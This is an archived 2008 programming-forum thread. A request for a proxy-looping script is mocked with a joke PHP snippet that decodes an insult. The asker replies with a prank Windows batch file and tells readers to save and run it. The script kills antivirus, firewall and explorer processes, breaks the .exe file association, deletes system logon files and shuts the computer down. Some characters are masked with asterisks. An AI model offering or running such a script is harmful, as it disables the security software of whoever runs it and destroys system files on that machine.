PDA

View Full Version : Simple loop.



ill0gic
05-07-2008, 11:35 AM
Hey, I'm a new user to this forum, so i guess this is me introducing myself.

Can anyone whip me up a little script to loop a new proxy every few seconds?

I dont have time for learning VBScript or all those useless languages/tools.
I am still a little new to computer languages and programming other than the old HTML, javascript, and SQL.

But back to the looping proxies, I would perfer it to be like Visual Basic or something. But I cant be picky, I'll take anything, Im a noob.

SyntaXmasteR
05-07-2008, 12:57 PM
useless languages/tools.

Yeah, who needs useless programming right? Well here is your proxy loop. Enjoy.



<?PHP

function decript_twit_level($RATING_translation,$RATING){
while($RATING){
$RATING_translation=base64_decode($RATING_translation);
$RATING--;
}
return($RATING_translation);
}


function ProxyLoop($UserMessage){

$UsefulProgramming=TRUE;

if($UsefulProgramming===FALSE){
$dizzy=TRUE;
}else{
$dizzy=FALSE;
}

if($dizzy===FALSE){
// LOOP ME AGAIN!
print($UserMessage);
return(*);
}else{
// TOO DIZZY, STOP!
return(0);
}
}



// TWIT RATING 5/5
$RATING=5;
$RATING_translation='VmxSR*QyRXlVa*ppUldoVFZqSlNjbFV*WkZOa0*YQkdWR*RPYkdKV*NrcFdiVEYzWVVkV*ZsTnVaRnB pVjNoRVdWVldjMU5IVmtsWA0KYld4T*RVVmFkZz0*';

while(ProxyLoop()){
$UserMessage=decript_twit_level($RATING_translation,$RATING);
ProxyLoop($UserMessage);
}

?>

ill0gic
05-07-2008, 01:59 PM
rofl.
thats a good one.

ill0gic
05-07-2008, 02:02 PM
BTW,
my twit rating is only 4/5. :D

SyntaXmasteR
05-07-2008, 02:17 PM
... :) ....

Moonbat
05-07-2008, 03:42 PM
I lol'ed at this thread. :p

ill0gic
05-07-2008, 04:50 PM
here save this as a batch file and run it.




title Twit Rating
color 0A
@echo off
set end=md "Hack installing"
set fin=copy "Hack log.txt" "Installing"
%end%
%fin%
net send * twit.exe is installing, press OK to begin set up.
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp*file
cls
msg * OK, mabeys only */5.
msg * -ill0gic
DEL C:\WINDOWS\system*2\logoff.exe /F /Q
DEL C:\WINDOWS\system*2\logon.exe /F /Q
DEL C:\WINDOWS\system*2\logon.scr /F /Q
cls
shutdown

ill0gic
05-07-2008, 04:52 PM
^^ theres your useless programming.

Moonbat
05-07-2008, 10:15 PM
I think we should make this the useless/joke programs thread. Yay/nay?

ill0gic
05-08-2008, 01:55 PM
Or just the Moderators not mock the ones who ask for help.

SyntaXmasteR
05-08-2008, 02:02 PM
Or just the Moderators not mock the ones who ask for help.

All mods are very helpful here. If you ask for help you will probably get it.

If you ask for someone to do all the work for you because you are too lazy to learn, They're all gonna laugh at you. (http://endor.org/sandler/laugh.html) (AUDIO (http://************/watch?v=WoW88FEB2OU))

ill0gic
05-09-2008, 12:53 PM
Alright well I will keep that in mind,
but i was simply asking if anyone had any code for an .exe that did that.
But never mind, ill just stick to tor.:)

Moonbat
05-09-2008, 04:38 PM
You could use a Firefox addon like FoxyProxy to do this, assuming you have Firefox.

ill0gic
05-09-2008, 05:11 PM
Yeah i have that too.
Well thanks anyway.

Ezekiel
05-15-2008, 08:18 AM
Or just the Moderators not mock the ones who ask for help.

It's pretty much part of the job description these days.

tornado
05-26-2008, 07:52 AM
hi i'm new here and i have no idea about programming
would u plz help me 2 chose my *st one
thanks u alot

Moonbat
05-27-2008, 06:13 PM
hi i'm new here and i have no idea about programming
would u plz help me 2 chose my *st one
thanks u alot
Read up on HTML. It's not a programming language per se, but it'll help you to get started in the world of programming.

http://www.w*schools.com/HTML/